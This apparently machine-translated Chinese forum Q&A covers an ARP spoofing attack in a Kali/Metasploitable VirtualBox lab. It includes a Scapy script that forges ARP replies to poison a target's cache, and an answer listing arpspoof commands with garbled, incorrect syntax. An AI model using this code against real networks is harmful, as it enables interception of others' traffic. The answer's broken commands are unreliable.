我正在尝试用Scapy进行arp欺骗攻击,但是我的目标arp表注册了我的ip地址而不是被欺骗的IP地址

问题描述

我正在尝试用船尾进行仿冒攻击。 我在Linux Min OS中使用virtualBox,我的攻击机是KaliLinux,目标是Metasploitable。 这是我的船长脚本:

targetIP="192.168.56.103"
gatewayIP="192.168.56.1"
myIP="192.168.56.101"
targetMAC="08:00:27:57:58:54"
myMAC="08:00:27:7d:94:1e"

a = ARP()
a.psrc = gatewayIP
a.pdst = targetIP
a.hwdst = targetMAC
a.hwsrc = myMAC
a.op = 2

send(a)

我发送了a后,我希望目标的arp表会

gatewayIP => myMAC

但是我得到了

myIp => myMAC

我在做什么错了?

解决方法

如果您想在Kalilinux中查看arp表;您可以在提示时编写arp --a。而且,如果您想攻击,也可以使用; arpspoof -i eth0 --targetIP NetworkDeviceIP arpspoof -i eth0 --NetworkDeviceIP targetIP

但不要忘记使IP向前发展。

我希望它会起作用。